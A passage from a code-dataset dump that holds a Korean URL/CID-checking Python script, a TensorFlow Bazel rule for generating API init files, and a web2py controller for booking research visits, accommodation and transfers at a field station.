마지막 렌딩된 url페이지가 정상적으로 켜졌으나 과연 맞는 페이지인지 구분해야함\n # 만약 정상적으로만 떠도 다 정상이라고 체크한다고 치면, 리다이렉트 있을 경우도 그냥 2가지 경우로 마지막 리다이렉팅 랜딩페이지가 정상or 찾을수 없을으로 구분하면됨\n '''\n print(\"-------- %s seconds --------\" % (time.time() - start_time)) \n return CheckList\n\ndef put_url_N(check, url_N):\n #short = []\n check_value = []\n \n for k,o in enumerate(check):\n i=0\n while i!=url_N[k]:\n check_value.append(o)\n #short.append(short_url[k])\n i+=1\n\n #Ch = DataFrame(check_value,columns=['URL_Check'])\n return check_value\n\n\nprint('Start')\nshort_url = remove_dup(url)[0]\n\nNum_list = remove_dup(url)[1]\n\n#result1은 cid값 확인값 list\nresult1 = Concate_Table(keyword,url)[0]\n\n#result2는 url check한 값들 \nCh = Check_URL(short_url)\nresult2 = put_url_N(Ch,Num_list)\n\n\n\n\ndef MakeTable(key,group,keyword,url,ngd,cid,check):\n final = []\n name = ['품목','그룹','키워드','랜딩URL','매체','일치 여부','Status']\n a = len(key)\n final.append(name)\n for i in range(a):\n final_1 = []\n final_1+= key[i], group[i], keyword[i], url[i], ngd[i], cid[i], check[i]\n final.append(final_1)\n return final\n\nFinal = MakeTable(key,group,keyword,url,ngd,result1,result2)\n\ncsv.register_dialect(\n 'mydialect',\n delimiter = ',',\n quotechar = '\"',\n doublequote = True,\n skipinitialspace = True,\n lineterminator = '\\r\\n',\n quoting = csv.QUOTE_MINIMAL)\n\n\n\nwith open(origin_output_path+'Cid&URL_Check.csv', 'w', newline='',encoding='euc-kr') as mycsvfile:\n thedatawriter = csv.writer(mycsvfile,dialect='mydialect')\n for row in Final:\n thedatawriter.writerow(row)\n\n\n''' \n\n\nurl = 'https://www.samsung.com/sec/support/model/SL-C480W/'\n\n\nurl_data = requests.get(url, verify=False) #(url, allow_redirects = True)\n#url_text = url_data.text\n#soup = BeautifulSoup(url_text, 'html.parser')\nurl_redirected = url_data.history\nurl_check = url_data.status_code\n\n'''\n","repo_name":"matherrr/brad","sub_path":"Cid_check.py","file_name":"Cid_check.py","file_ext":"py","file_size_in_byte":10429,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"44206207939","text":"\"\"\"Targets for generating TensorFlow Python API __init__.py files.\"\"\"\n\nload(\"//tensorflow/python/tools/api/generator:api_init_files.bzl\", \"TENSORFLOW_API_INIT_FILES\")\n\n# keep sorted\nESTIMATOR_API_INIT_FILES = [\n # BEGIN GENERATED ESTIMATOR FILES\n \"__init__.py\",\n \"estimator/__init__.py\",\n \"estimator/export/__init__.py\",\n \"estimator/inputs/__init__.py\",\n # END GENERATED ESTIMATOR FILES\n]\n\ndef get_compat_files(\n file_paths,\n compat_api_version):\n \"\"\"Prepends compat/v to file_paths.\"\"\"\n return [\"compat/v%d/%s\" % (compat_api_version, f) for f in file_paths]\n\ndef gen_api_init_files(\n name,\n output_files = TENSORFLOW_API_INIT_FILES,\n root_init_template = None,\n srcs = [],\n api_name = \"tensorflow\",\n api_version = 2,\n compat_api_versions = [],\n package = \"tensorflow.python\",\n package_dep = \"//tensorflow/python:no_contrib\",\n output_package = \"tensorflow\",\n output_dir = \"\"):\n \"\"\"Creates API directory structure and __init__.py files.\n\n Creates a genrule that generates a directory structure with __init__.py\n files that import all exported modules (i.e. modules with tf_export\n decorators).\n\n Args:\n name: name of genrule to create.\n output_files: List of __init__.py files that should be generated.\n This list should include file name for every module exported using\n tf_export. For e.g. if an op is decorated with\n @tf_export('module1.module2', 'module3'). Then, output_files should\n include module1/module2/__init__.py and module3/__init__.py.\n root_init_template: Python init file that should be used as template for\n root __init__.py file. \"# API IMPORTS PLACEHOLDER\" comment inside this\n template will be replaced with root imports collected by this genrule.\n srcs: genrule sources. If passing root_init_template, the template file\n must be included in sources.\n api_name: Name of the project that you want to generate API files for\n (e.g. \"tensorflow\" or \"estimator\").\n api_version: TensorFlow API version to generate. Must be either 1 or 2.\n compat_api_versions: Older TensorFlow API versions to generate under\n compat/ directory.\n package: Python package containing the @tf_export decorators you want to\n process\n package_dep: Python library target containing your package.\n output_package: Package where generated API will be added to.\n output_dir: Subdirectory to output API to.\n If non-empty, must end with '/'.\n \"\"\"\n root_init_template_flag = \"\"\n if root_init_template:\n root_init_template_flag = \"--root_init_template=$(location \" + root_init_template + \")\"\n\n api_gen_binary_target = (\"create_\" + package + \"_api_%d\") % api_version\n native.py_binary(\n name = api_gen_binary_target,\n srcs = [\"//tensorflow/python/tools/api/generator:create_python_api.py\"],\n main = \"//tensorflow/python/tools/api/generator:create_python_api.py\",\n srcs_version = \"PY2AND3\",\n visibility = [\"//visibility:public\"],\n deps = [\n package_dep,\n \"//tensorflow/python:util\",\n \"//tensorflow/python/tools/api/generator:doc_srcs\",\n ],\n )\n\n all_output_files = [\"%s%s\" % (output_dir, f) for f in output_files]\n compat_api_version_flags = \"\"\n for compat_api_version in compat_api_versions:\n compat_api_version_flags += \" --compat_apiversion=%d\" % compat_api_version\n\n native.genrule(\n name = name,\n outs = all_output_files,\n cmd = (\n \"$(location :\" + api_gen_binary_target + \") \" +\n root_init_template_flag + \" --apidir=$(@D)\" + output_dir +\n \" --apiname=\" + api_name + \" --apiversion=\" + str(api_version) +\n compat_api_version_flags + \" --package=\" + package +\n \" --output_package=\" + output_package + \" $(OUTS)\"\n ),\n srcs = srcs,\n tools = [\":\" + api_gen_binary_target],\n visibility = [\n \"//tensorflow:__pkg__\",\n \"//tensorflow/tools/api/tests:__pkg__\",\n ],\n )\n","repo_name":"steerzac/chkstong-yibbibi","sub_path":"tensorflow-master/tensorflow/python/tools/api/generator/api_gen.bzl","file_name":"api_gen.bzl","file_ext":"bzl","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"60"} +{"seq_id":"8556926518","text":"import datetime\nfrom collections import Counter\nfrom gluon.serializers import json\nimport simplejson\n\nfrom safe_web_global_functions import (admin_decision_form, safe_mailer, datepicker_script,\n all_rv_summary_text, all_rv_summary_excel,\n single_rv_summary_excel, uname, get_frm)\n\n\n# -----------------------------------------------------------------------------\n# RESEARCH VISITS\n# -- provide a general grid view of visits for users and routes to a detail view \n# that allows research visits to be proposed and various bookings to be made\n# -----------------------------------------------------------------------------\n\n\n@auth.requires_login()\ndef research_visits():\n \"\"\"\n This controller shows the grid view for visits and allows\n logged in users to view details\n\n It uses a custom button to divert from the SQLFORM.grid view to a\n custom view page that allows project members to add visitors\n \"\"\"\n\n # For standard users (need a separate admin projects controller)\n # don't show the authorization fields and don't show a few behind \n # the scenes fields\n db.research_visit.admin_notes.readable = False\n\n # create a links list that:\n # 1) creates a custom button to pass the row id to a custom view \n # Commented out code here allows the form to show a pretty icon for status, BUT\n # blocks it from being used in searches. So don't do that.\n\n links = [ # dict(header = 'Admin Status', body = lambda row: approval_icons[row.admin_status]),\n dict(header='', body=lambda row: A('View', _class='button btn btn-default',\n _href=URL(\"research_visits\", \"research_visit_details\",\n args=[row.id]),\n _style='padding: 3px 10px 3px 10px;'))\n ]\n\n # suppress status in SQLFORM grid whilst making it available for links\n # db.research_visit.admin_status.readable = True \n\n form = SQLFORM.grid(db.research_visit, csv=False,\n fields=[db.research_visit.project_id, db.research_visit.title,\n db.research_visit.arrival_date, db.research_visit.departure_date,\n db.research_visit.admin_status],\n maxtextlength=250,\n deletable=False,\n editable=False,\n create=False,\n details=False,\n links=links,\n links_placement='right',\n formargs={'showid': False})\n\n return dict(form=form)\n\n\n@auth.requires_login()\ndef research_visit_details():\n \"\"\"\n Complex controller to book visits to give a single page to hold:\n * Complete and submit basic RV details (purpose/period)\n * That exposes a set of booking controls...\n - visitors and H&S\n - booking beds at SAFE and Maliau\n - booking RA time\n - booking transfers\n * ... and a set of tables of existing bookings with cancel buttons\n \n It relies on some client side javascript to:\n - check before deleting visitors\n - update SAFE availability\n - provide check all buttons for selecting sets of checkboxes\n - restricted date ranges using datepicker (parameterised on the fly from the controller)\n \"\"\"\n\n #\n # SECTION 1) CHECK USER STATUS AND SET UP \n #\n\n # Three possible entry points, for a three step process to allow project date look ups\n # - Completely new RV request(bare URL)\n # - Project specified for new RV request (project_id as a variable, but no record)\n # research_visits/research_visit_details?new=152\n # - Existing record passed as an argument to the URL\n # research_visits/research_visit_details/12\n\n # 1a) SANITISE THE INPUTS\n rv_id = request.args(0)\n\n if rv_id is not None:\n record = db.research_visit(rv_id)\n new_rv_project_requested = '0'\n # # If the visit is given as an ID, does it really exist?\n if record is None:\n session.flash = B(CENTER('Invalid research visit id'), _style='color:red;')\n redirect(URL('research_visits', 'research_visits'))\n else:\n record = None\n new_rv_project_requested = request.vars['new']\n # if a project has been requested (and it isn't a look see project) \n # then check it exists and is approved\n if new_rv_project_requested is not None and new_rv_project_requested != '0':\n new_project_record = db((db.project_id.id == new_rv_project_requested) &\n (db.project_details.id ==\n db.project_id.project_details_id)).select().first()\n if new_project_record is None:\n session.flash = B(CENTER('Invalid new visit project reference'),\n _style='color:red;')\n redirect(URL('research_visits', 'research_visit_details'))\n elif new_project_record.project_details.admin_status != 'Approved':\n session.flash = B(\n CENTER('A research project must be approved before booking research visits'),\n _style='color:red;')\n redirect(URL('research_visits', 'research_visit_details'))\n\n # 1b) get a list of approved projects that the user is a coordinator of,\n # to check for both project selection and subsequent project detail\n # editing and booking.\n coord_query = db((db.project_members.user_id == auth.user_id) &\n (db.project_members.is_coordinator == 'True') &\n (db.project_members.project_id == db.project_id.id) &\n (db.project_id.project_details_id == db.project_details.id) &\n (db.project_details.admin_status == 'Approved'))\n\n rows = coord_query.select(db.project_details.project_id, db.project_details.title)\n available_project_ids = [r.project_id for r in rows]\n available_project_titles = [r.title for r in rows]\n\n # 1c) setup whether the record is editable\n if record is None:\n # just in the process of launching a proposal\n readonly = False\n elif record.admin_status == 'Submitted':\n # this proposal is under consideration, regardless of user\n readonly = True\n elif record.departure_date < datetime.date.today():\n # this proposal happened in the past\n readonly = True\n elif (record.project_id in available_project_ids):\n # this proposal is in the set that the user is a coordinator for\n readonly = False\n elif record.project_id is None and auth.user.id == record.proposer_id:\n # The proposer is editing his own look see visit.\n readonly = False\n elif auth.has_membership('admin'):\n # The proposal is being viewed by an admin (and none of the cases above are true)\n readonly = False\n else:\n # just a random viewer, so no write access\n readonly = True\n\n # SECTION 2) CAPTURE THE BASIC VISIT DETAILS\n # This is a three step process. \n # A) Get a project reference, in order to get date limits, \n # B) Provide a fuller visit details form \n # C) Expose a set of booking controls for the user to build the plan\n\n if rv_id is None and new_rv_project_requested is None:\n\n # Bare URL submitted: provide a list of available projects + look see visit\n # and redirect back to the page, with the new project_id for the next step\n\n project_selector = SELECT(OPTION('Look see visit', _value='0'),\n *[OPTION(title, _value=pid) for title, pid in\n zip(available_project_titles, available_project_ids)],\n _class='form-control', _name='project_selector')\n\n visit = FORM(DIV(DIV(H5('Research visit summary'), _class=\"panel-heading\"),\n DIV(DIV(LABEL('Choose project:', _class=\"control-label col-sm-2\"),\n DIV(project_selector, _class=\"col-sm-8\"),\n TAG.BUTTON('Select', _style=\"padding: 5px 15px\", _class='col-sm-2',\n _type='submit', _name='submit_project_select'),\n _class='row', _style='margin:10px 10px'),\n _class='panel_body'),\n _class=\"panel panel-primary\"))\n\n if visit.validate():\n # reload the URL with the id of the new project as a variable\n redirect(URL('research_visits', 'research_visit_details',\n vars={'new': visit.vars.project_selector}))\n\n else:\n # Either a) URL with a project requested as a variable 'research_visit_details?new='866' \n # b) URL giving an existing record 'research_visit_details/4' \n if rv_id is not None:\n # intercept existing records first\n buttons = [TAG.button('Save edits', _type=\"submit\",\n _name='save_proposal', _style='padding: 5px 15px 5px 15px;')]\n elif new_rv_project_requested is not None:\n # then new ones (as the code sets new_rv_request_submitted = 0 for rv_id calls)\n buttons = [TAG.button('Create proposal', _type=\"submit\",\n _name='save_proposal', _style='padding: 5px 15px 5px 15px;')]\n\n # Use SQLFORM for DB input - fix the proposer ID here\n db.research_visit.proposer_id.default = auth.user.id\n db.research_visit.proposer_id.writable = False\n visit = SQLFORM(db.research_visit,\n record=record,\n readonly=readonly,\n fields=['title', 'arrival_date', 'proposer_id',\n 'departure_date', 'purpose', 'licence_details'],\n buttons=buttons,\n showid=False)\n\n # process the visit form to create hidden fields and to process input\n if visit.process(onvalidation=validate_research_visit_details, formname='visit').accepted:\n\n # if this is a new proposal then need to insert the project_id,\n # which isn't included in the form, but not if this is a look see visit\n if rv_id is None and new_rv_project_requested != '0':\n db.research_visit(visit.vars.id).update_record(project_id=new_rv_project_requested)\n\n # if this is a new draft, email the proposer the link for the page\n if rv_id is None:\n safe_mailer(to=auth.user.email,\n subject='SAFE: draft research visit proposal created',\n template='research_visit_created.html',\n template_dict={'name': auth.user.first_name,\n 'url': URL('research_visits', 'research_visit_details',\n args=[visit.vars.id], scheme=True,\n host=True)})\n\n db.research_visit(visit.vars.id).update_record(admin_status='Draft',\n admin_history='Draft proposal created: {}'.format(\n datetime.datetime.utcnow().strftime(\n '%Y-%m-%dT%H:%MZ')))\n session.flash = CENTER(B('Research visit proposal created'), _style='color: green')\n\n else:\n session.flash = CENTER(B('Research visit proposal updated'), _style='color: green')\n\n redirect(URL('research_visits', 'research_visit_details', args=visit.vars.id))\n else:\n\n pass\n\n # Now repackage the form into a custom DIV\n # edit form widgets - notably, override the default date widget classes to allow\n # them to use the daterange datepicker\n if not readonly:\n visit.custom.widget.purpose['_rows'] = 4\n visit.custom.widget.arrival_date['_class'] = \"form-control input-sm\"\n visit.custom.widget.departure_date['_class'] = \"form-control input-sm\"\n purpose_message = P('''Please provide a detailed description here and then request\n all the resources you will need. If your research visit \n will not need to use our RAs or transfers, please mention\n what alternatives you will be using so that we know you have\n a complete fieldwork plan.''')\n else:\n purpose_message = ''\n\n # get the project details\n if (record is not None and record.project_id is not None) or (\n new_rv_project_requested != '0'):\n\n if new_rv_project_requested != '0':\n pid = int(new_rv_project_requested)\n elif record.project_id is not None:\n pid = record.project_id\n\n proj_row = db((db.project_id.id == pid) & (\n db.project_id.project_details_id == db.project_details.id))\n project_details = proj_row.select().first()\n proj_title = project_details.project_details.title\n\n else:\n project_details = None\n proj_title = 'Look see visit'\n\n proj_row = DIV(LABEL('Project title:', _class=\"control-label col-sm-2\"),\n DIV(proj_title, _class=\"col-sm-10\"),\n _class='row', _style='margin:10px 10px')\n\n # get a download link for the budget and timetable spreadsheet\n if rv_id is None:\n download_link = DIV()\n else:\n download_link = CAT(\n 'Click on this link to download a spreadsheet of the details and estimated costs: ',\n A('Download spreadsheet',\n _href=URL('research_visits', 'export_my_research_visit', args=rv_id)))\n\n # fix up the dates to control the datepicker and the bed booking limits\n if auth.has_membership('admin'):\n # admins can book up to capacity and do so over any time period\n visit_start_min = ''\n visit_end_max = ''\n bed_booking_limit = bed_booking_capacity\n else:\n if new_rv_project_requested == '0' or (\n record is not None and record.project_id is None):\n # look see visits can book up to the normal bed limit with a fortnights notice\n visit_start_min = '+14d'\n visit_end_max = ''\n else:\n # project bookings have to be at least 14 days notice and within the project dates\n project_start = project_details.project_details.start_date\n project_end = project_details.project_details.end_date\n fortnight = datetime.date.today() + datetime.timedelta(days=14)\n # check the project hasn't finished\n if project_end < fortnight:\n session.flash = CENTER(\n B('The completion date for the proposed project has passed.'),\n _style='color: red')\n redirect(URL('research_visits', 'research_visit_details'))\n else:\n visit_start_min = max(project_start, fortnight).isoformat()\n visit_end_max = project_end.isoformat()\n\n # javascript to run the datepicker\n visit_js = datepicker_script(html_id='visit_datepicker',\n autoclose='true',\n startDate='\"' + visit_start_min + '\"',\n endDate='\"' + visit_end_max + '\"')\n\n # status flag\n if record is not None:\n status = DIV(approval_icons[record.admin_status], XML(' '),\n 'Status: ', XML(' '), record.admin_status,\n _class='col-sm-3',\n _style='padding: 5px 15px 5px 15px;'\n 'background-color:lightgrey;color:black;')\n else:\n status = DIV()\n\n visit = FORM(DIV(DIV(\n DIV(H5('Research visit summary', _class='col-sm-9'), status, _class='row',\n _style='margin:0px 0px'),\n _class=\"panel-heading\"),\n DIV(visit.custom.begin, proj_row,\n DIV(LABEL('Proposer :', _class=\"control-label col-sm-2\"),\n DIV(visit.custom.widget.proposer_id, _class=\"col-sm-10\"),\n _class='row', _style='margin:10px 10px'),\n DIV(LABEL('Visit title:', _class=\"control-label col-sm-2\"),\n DIV(visit.custom.widget.title, _class=\"col-sm-10\"),\n _class='row', _style='margin:10px 10px'),\n DIV(LABEL('Dates:', _class=\"control-label col-sm-2\"),\n DIV(DIV(visit.custom.widget.arrival_date,\n SPAN('to', _class=\"input-group-addon input-sm\"),\n visit.custom.widget.departure_date,\n _class=\"input-daterange input-group\",\n _id=\"visit_datepicker\"),\n _class='col-sm-10'),\n _class='row', _style='margin:10px 10px'),\n DIV(LABEL('Purpose:', _class=\"control-label col-sm-2\"),\n DIV(purpose_message, visit.custom.widget.purpose,\n _class=\"col-sm-10\"),\n _class='row', _style='margin:10px 10px'),\n DIV(DIV(visit.custom.submit, _class=\"col-sm-10 col-sm-offset-2\"),\n _class='row', _style='margin:10px 10px'),\n visit.custom.end,\n _class='panel_body'),\n DIV(download_link, _class='panel-footer'),\n _class=\"panel panel-primary\"),\n visit_js)\n\n #\n # SECTION 3) PROVIDE THE BOOKING CONTROLS \n #\n\n # This consists of a giant form - most panels could work independently \n # but the first two (accom/transfers), need access to a list of selected visitors\n # A) A panel to select and edit the list of visitors\n # B) A panel to book accommodation at SAFE or Maliau\n # C) A panel to book site transfers\n # D) A panel to book research assistants\n # These are followed by tables of existing bookings that allow record deletion\n # E) SAFE Accomodation\n # F) Maliau Accomodation\n # G) Site transfers\n # H) Research assistant bookings\n # I) Submit button panel\n\n # setup icons and the instructions\n delete_icon = SPAN(_class=\"glyphicon glyphicon-remove-sign\",\n _style=\"color:red;\")\n\n replace_icon = SPAN(_class=\"glyphicon glyphicon-refresh\",\n _style=\"color:red;\")\n\n add_visitor_icon = CAT(SPAN(_class=\"glyphicon glyphicon-user\"), XML(' '),\n SPAN(_class=\"glyphicon glyphicon-plus-sign\"))\n\n add_project_icon = CAT(SPAN(_class=\"glyphicon glyphicon-user\"),\n SPAN(_class=\"glyphicon glyphicon-user\"),\n SPAN(_class=\"glyphicon glyphicon-user\"), XML(' '),\n SPAN(_class=\"glyphicon glyphicon-plus-sign\"))\n\n reserve_bed_icon = CAT(SPAN(_class=\"glyphicon glyphicon-bed\"), XML(' '),\n SPAN(_class=\"glyphicon glyphicon-plus-sign\"))\n\n release_bed_icon = CAT(SPAN(_class=\"glyphicon glyphicon-bed\"), XML(' '),\n SPAN(_class=\"glyphicon glyphicon-refresh\"))\n\n reserve_transfer_icon = CAT(SPAN(_class=\"glyphicon glyphicon-road\"), XML(' '),\n SPAN(_class=\"glyphicon glyphicon-plus-sign\"))\n\n reserve_ra_icon = CAT(SPAN(_class=\"glyphicon glyphicon-leaf\"), XML(' '),\n SPAN(_class=\"glyphicon glyphicon-plus-sign\"))\n\n icons = {'delete_icon': delete_icon,\n 'replace_icon': replace_icon,\n 'add_visitor_icon': add_visitor_icon,\n 'add_project_icon': add_project_icon,\n 'reserve_bed_icon': reserve_bed_icon,\n 'release_bed_icon': release_bed_icon,\n 'reserve_transfer_icon': reserve_transfer_icon,\n 'reserve_ra_icon': reserve_ra_icon}\n\n if rv_id is None:\n console = DIV()\n else:\n # Define common elements shared across tables:\n # - an extra column in tables when not readonly to insert delete buttons\n if readonly:\n delete_column_head = \"\"\n else:\n delete_column_head = TH(_width='30px')\n\n # - Each table has it's own local row packing function as the columns vary\n # This local function (and the globally available uname) provide common code within row packers\n\n def del_btn(rid, btn_name, readonly):\n\n if readonly:\n delete = \"\"\n else:\n btn_name = btn_name + str(rid)\n delete = TD(TAG.BUTTON(SPAN(_class=\"glyphicon glyphicon-remove-sign\",\n _style=\"color:red;font-size: 1.6em;padding: 0px 10px;\"),\n _type='submit', _name=btn_name, _id=btn_name,\n _style='background:None;padding:0px'))\n\n return delete\n\n # A ) VISITOR PANEL\n # TODO - consider bootstrap modal for prettiness http://plnkr.co/edit/NePR0BQf3VmKtuMmhVR7?p=preview\n\n # get current visitors\n visit_select = db(db.research_visit_member.research_visit_id == rv_id).select()\n\n # Package rows up in a table with row selectors if non read-only\n def pack_visit(r, readonly):\n\n nm = uname(r.user_id, r.id)\n delete = del_btn(r.id, 'delete_visitor_', readonly)\n replace = del_btn(r.id, 'replace_visitor_', readonly)\n\n if not readonly:\n # edit these delete buttons to trigger the java modal warning\n delete.element('BUTTON').attributes['_onclick'] = 'show_alert(this.id)'\n # change the icon in the replace link\n replace.element('span').attributes['_class'] = \"glyphicon glyphicon-refresh\"\n\n chk = '' if readonly else CAT(INPUT(_type='checkbox', _name='records', _value=r.id),\n XML(' '))\n\n # link to H&S \n if r.user_id is None or r.user_id.h_and_s_id is None:\n hs = hs_no\n elif readonly:\n hs = hs_ok\n else:\n hs = A(hs_ok, _href=URL('health_safety', 'health_and_safety', args=r.user_id))\n\n row = TR(TD(LABEL(chk, nm)), TD(hs), delete, replace)\n\n return row\n\n table_rows = [pack_visit(r, readonly) for r in visit_select]\n\n # adjust headings for table and insert controls \n if readonly:\n headings = TR(TH('Visit members'), TH('H&S'))\n else:\n headings = TR(\n TH(LABEL(INPUT(_type='checkbox', _id='checkAll'), XML(' '), 'Select all')),\n TH('H&S'), delete_column_head, delete_column_head)\n\n # get a selector of valid users\n # - look see visits can add anyone, but projects can only add project members\n # - both can add 'Unknown' users to be updated later. Users are linked to bookings\n # by the research visit member id field, so can be replaced across the bookings\n # - don't remove people who are already members - needed for replacement\n if record.project_id is None:\n # anyone can join a look see visit\n users = db(db.auth_user.id > 0).select(\n orderby=db.auth_user.last_name | db.auth_user.first_name)\n else:\n # select the rows from auth_users for project members\n users = db((db.project_members.project_id == record.project_id) &\n (db.project_members.user_id == db.auth_user.id)).select(db.auth_user.ALL,\n orderby=db.auth_user.last_name | db.auth_user.first_name)\n\n options = [OPTION(u.last_name + ', ' + u.first_name, _value=u.id) for u in users]\n\n visitor_select = SELECT(OPTION('Unknown', _value=0),\n *options,\n _name='user',\n _class=\"generic-widget form-control input-sm col-sm-3\")\n\n add_visitor = TAG.BUTTON(add_visitor_icon,\n _style='padding: 5px 15px',\n _type='submit', _name='add_visitor')\n\n add_project = TAG.BUTTON(add_project_icon,\n _style='padding: 5px 15px;background:lightgrey;color:black;',\n _type='submit', _name='add_project',\n _title='Add project members')\n\n table_rows.append(TR(TD(visitor_select), TD(add_visitor, _colspan=3)))\n\n # build table\n visitor_table = TABLE(headings, *table_rows, _class='table table-striped')\n\n # combine into the panel\n if readonly:\n visitors = DIV(DIV(H5('Research visit members'), _class=\"panel-heading\"),\n visitor_table,\n # vague TODO - make this table handle squashing better (enable .table-responsive?)\n _class=\"panel panel-primary\", _name='visitors')\n else:\n visitors = DIV(DIV(DIV(H5(SPAN(_class=\"glyphicon glyphicon-question-sign\",\n **{'_data-toggle': \"modal\",\n '_data-target': \"#rv_members_modal\"}),\n XML(' ') * 2, 'Research Visit Members',\n _class='col-sm-8'),\n DIV(DIV(add_project, _class=' pull-right'), _class='col-sm-4'),\n _class='row'),\n _class=\"panel-heading\"),\n visitor_table,\n _class=\"panel panel-primary\")\n\n # B) Accomodation booking form\n\n # create the panel\n accm_pane = DIV(DIV(DIV(H5(SPAN(_class=\"glyphicon glyphicon-question-sign\",\n **{'_data-toggle': \"modal\",\n '_data-target': \"#accom_modal\"}),\n XML(' ') * 2, 'Accommodation requests', _class='col-sm-8'),\n DIV(DIV(TAG.BUTTON(reserve_bed_icon, _type='submit',\n _name='reserve_beds',\n _style='padding: 5px 15px;background:lightgrey;color:black;'),\n XML(' ') * 5,\n TAG.BUTTON(release_bed_icon, _type='submit',\n _name='release_beds',\n _style='padding: 5px 15px;background:lightgrey;color:black;'),\n _class='pull-right'),\n _class='col-sm-4'),\n _class='row'),\n _class=\"panel-heading\"),\n DIV(DIV(LABEL('Dates:', _class='col-sm-2'),\n DIV(DIV(INPUT(type=\"text\", _class=\"form-control input-sm\",\n _name=\"accom_arrive\",\n _onchange='date_change()', _id='accom_arrive'),\n SPAN('to', _class=\"input-group-addon\"),\n INPUT(type=\"text\", _class=\"form-control input-sm\",\n _name=\"accom_depart\",\n _onchange='date_change()', _id='accom_depart'),\n _class=\"input-daterange input-group\",\n _id=\"accom_datepicker\"),\n _class='col-sm-10'),\n _class='row'),\n DIV(DIV(_class='col-sm-2'),\n DIV('Note: these dates are the arrival date and departure dates',\n _class='col-sm-10'),\n _class='row', _style='margin:2px'),\n DIV(LABEL('Location:', _class='col-sm-2'),\n DIV(LABEL(INPUT(_type='radio', _name='location',\n _value='SAFE', value='SAFE', _onclick='locSAFE()'),\n 'SAFE', _class='form-control input-sm'),\n _class=' col-sm-5'),\n DIV(LABEL(INPUT(_type='radio', _name='location',\n _value='Maliau', value='SAFE',\n _onclick='locMaliau()'),\n 'Maliau', _class='form-control input-sm'),\n _class=' col-sm-5'),\n _class='row'),\n DIV(LABEL('Options:', _class='col-sm-2'),\n DIV(DIV(LABEL(\n INPUT(_type='radio', _name='maliau_type', _value='Annex',\n value='Annex'),\n 'Annex', _class='form-control input-sm'),\n _class='form_control'),\n DIV(LABEL(\n INPUT(_type='radio', _name='maliau_type', _value='Hostel',\n value='Annex'),\n 'Hostel', _class='form-control input-sm'),\n _class='form_control'),\n _class=' col-sm-5'),\n DIV(DIV(LABEL(INPUT(_type='checkbox', _name='maliau_breakfast'),\n 'Breakfast', _class='form-control input-sm'),\n _class='form_control'),\n DIV(LABEL(INPUT(_type='checkbox', _name='maliau_lunch'),\n 'Lunch', _class='form-control input-sm'),\n _class='form_control'),\n DIV(LABEL(INPUT(_type='checkbox', _name='maliau_dinner'),\n 'Dinner', _class='form-control input-sm'),\n _class='form_control'),\n _class=' col-sm-5'),\n _class='row', _id='maliau_options', _style='display:none;'),\n DIV(LABEL('Availability:', _class='col-sm-2'),\n DIV('Select dates to show SAFE availability', _id='safe_avail',\n _class=' col-sm-10'),\n _class='row', _id='safe_options', _style='display:block;'),\n _class='panel-body'),\n # DIV(_class='panel-footer'),\n _class='panel panel-primary')\n\n # add javascript to power and constrain the daterange picker and hide/reveal maliau options\n accom_js = datepicker_script(html_id='accom_datepicker',\n autoclose='true',\n startDate='\"' + record.arrival_date.isoformat() + '\"',\n endDate='\"' + record.departure_date.isoformat() + '\"')\n\n accom_test = CAT(accm_pane, accom_js)\n\n # C) Site transfer bookings panel\n transfers_panel = DIV(DIV(DIV(H5(SPAN(_class=\"glyphicon glyphicon-question-sign\",\n **{'_data-toggle': \"modal\",\n '_data-target': \"#transfer_modal\"}),\n XML(' ') * 2, 'Site transfer requests (Wed/Sun only)',\n _class='col-sm-8'),\n DIV(DIV(TAG.BUTTON(reserve_transfer_icon, _type='submit',\n _name='book_transfer',\n _style='padding: 5px 15px;background:lightgrey;color:black;'),\n _class='pull-right'),\n _class='col-sm-4'),\n _class='row'),\n _class=\"panel-heading\"),\n DIV(DIV(LABEL('Date:', _class='col-sm-2'),\n DIV(INPUT(type=\"text\", _class=\"form-control input-sm\",\n _name=\"transfer_datepicker\",\n _id=\"transfer_datepicker\"),\n _class='col-sm-4'),\n LABEL('Transfer:', _class='col-sm-2'),\n DIV(SELECT(transfer_set,\n _name='transfer',\n _class=\"form-control input-sm\"),\n _class=\"col-sm-4\"),\n _class='row'),\n DIV(DIV('Please look ', A('here', _href=URL('research_visits',\n 'safe_transfers_schedule'),\n _target=\"_blank\"),\n ' and try to work with existing scheduled transfers.',\n _class=' col-sm-12'),\n _class='row'),\n # DIV(LABEL('Availability:', _class='col-sm-2'),\n # DIV('Select date to show availability', _id='transfer_avail', _class=' col-sm-10'),\n # _class='row'),\n _class='panel-body'),\n _class='panel panel-primary')\n\n # add javascript to constrain datepicker and only let admins add days that aren't We/Su\n if auth.has_membership('admin'):\n transfer_days = '\"\"'\n else:\n transfer_days = '\"12456\"'\n\n transfers_js = datepicker_script(html_id='transfer_datepicker',\n autoclose=\"true\",\n startDate='\"' + record.arrival_date.isoformat() + '\"',\n endDate='\"' + record.departure_date.isoformat() + '\"',\n daysOfWeekDisabled=transfer_days)\n\n transfers_panel = CAT(transfers_panel, transfers_js)\n\n # D) RA booking panel\n ra_panel = DIV(DIV(DIV(H5(SPAN(_class=\"glyphicon glyphicon-question-sign\",\n **{'_data-toggle': \"modal\", '_data-target': \"#ra_modal\"}),\n XML(' ') * 2, 'Research Assistant support requests',\n _class='col-sm-8'),\n DIV(DIV(TAG.BUTTON(reserve_ra_icon, _type='submit',\n _name='book_res_assist',\n _style='padding: 5px 15px;background:lightgrey;color:black;'),\n _class='pull-right'),\n _class='col-sm-4'),\n _class='row'),\n _class=\"panel-heading\"),\n DIV(DIV(LABEL('Dates:', _class='col-sm-3'),\n DIV(DIV(INPUT(type=\"text\", _class=\"form-control input-sm\",\n _name=\"ra_start\", _id='ra_start'),\n SPAN('to', _class=\"input-group-addon\"),\n INPUT(type=\"text\", _class=\"form-control input-sm\",\n _name=\"ra_end\", _id='ra_stop'),\n _class=\"input-daterange input-group\", _id=\"ra_datepicker\"),\n _class='col-sm-9'),\n _class='row'),\n DIV(_class='row', _style='margin:2px'),\n DIV(LABEL('Site and time:', _class='col-sm-3'),\n DIV(SELECT(res_assist_set,\n _name='ra_site_time',\n _class=\"form-control input-sm\"),\n _class=\"col-sm-9\"),\n _class='row'),\n DIV(_class='row', _style='margin:2px'),\n DIV(LABEL('Work type:', _class='col-sm-3'),\n DIV(LABEL(INPUT(_type='radio', _name='ra_work_type',\n _value='Standard', value='Standard'),\n 'Standard', _class='form-control input-sm'),\n 